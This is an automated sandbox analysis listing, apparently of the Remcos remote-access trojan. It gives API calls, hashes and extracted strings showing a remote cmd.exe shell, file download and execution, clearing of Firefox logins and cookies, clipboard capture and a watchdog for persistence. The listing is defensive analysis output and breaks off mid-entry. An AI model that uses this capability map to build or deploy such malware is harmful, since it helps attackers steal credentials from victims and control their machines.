                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID:
                                • API String ID: 1818849710-0
                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventObjectSingleWaitrecv
                                • String ID:
                                • API String ID: 311754179-0
                                • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen
                                • String ID: pQG
                                • API String ID: 176396367-3769108836
                                • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B793
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: @
                                • API String ID: 1890195054-2766056989
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                Strings
                                Yara matches
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: @
                                • API String ID: 1890195054-2766056989
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                Yara matches
                                Similarity
                                • API ID: CreateEventStartupsocket
                                • String ID:
                                • API String ID: 1953588214-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetForegroundWindow.USER32 ref: 0041BAB8
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                Yara matches
                                Similarity
                                • API ID: Window$ForegroundText
                                • String ID:
                                • API String ID: 29597999-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                  • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                Yara matches
                                Similarity
                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                • String ID:
                                • API String ID: 1170566393-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                Yara matches
                                Similarity
                                • API ID: Startup
                                • String ID:
                                • API String ID: 724789610-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                Yara matches
                                Similarity
                                • API ID: FromGdipImageLoadStream
                                • String ID:
                                • API String ID: 3292405956-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                Yara matches
                                Similarity
                                • API ID: GdipImageSaveStream
                                • String ID:
                                • API String ID: 971487142-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                Yara matches
                                Similarity
                                • API ID: Deallocatestd::_
                                • String ID:
                                • API String ID: 1323251999-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Yara matches
                                Similarity
                                • API ID: DisposeGdipImage
                                • String ID:
                                • API String ID: 1024088383-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C2EC
                                  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C31C
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C371
                                  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D2
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D9
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                Strings
                                Yara matches
                                Similarity
                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                • API String ID: 1067849700-181434739
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 89468d9d819689ce71a14d6c2ab0f362868c66ae6ec47320c110a82a7cdc7e5c
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 89468d9d819689ce71a14d6c2ab0f362868c66ae6ec47320c110a82a7cdc7e5c
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: Pj$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-1185936727
                                • Opcode ID: a6f06d6d975461e53999e87d355abb972fdf6fcb2e3af8b957eb56666153e528
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: a6f06d6d975461e53999e87d355abb972fdf6fcb2e3af8b957eb56666153e528
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: f67c7b742204fdc5d77f255c0325554f1dfd1f76d2e9b6ee77996e0de3cbfab6
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: f67c7b742204fdc5d77f255c0325554f1dfd1f76d2e9b6ee77996e0de3cbfab6
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@$hdF
                                • API String ID: 3520204547-3475379602
                                • Opcode ID: 58fed128c3f86ab17b0bd22f60481775d3bd2f1df992e5f45e4f6afff7fde0a0
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 58fed128c3f86ab17b0bd22f60481775d3bd2f1df992e5f45e4f6afff7fde0a0
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$Pj$hdF$hdF$ieinstal.exe$ielowutil.exe
                                • API String ID: 3756808967-3523306958
                                • Opcode ID: 5a2294e59db7c27b7807dc3d136ce10c94905aa7ef5ac5238dac54e749f80625
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 5a2294e59db7c27b7807dc3d136ce10c94905aa7ef5ac5238dac54e749f80625
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                • FindClose.KERNEL32(00000000), ref: 0040BED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 5cc50f8fd21b53155f4fa546f2c7f68f14a55f9ccce602792c20db31142d2112
                                • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                • Opcode Fuzzy Hash: 5cc50f8fd21b53155f4fa546f2c7f68f14a55f9ccce602792c20db31142d2112
                                • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                • Opcode ID: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                • Opcode Fuzzy Hash: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C31C
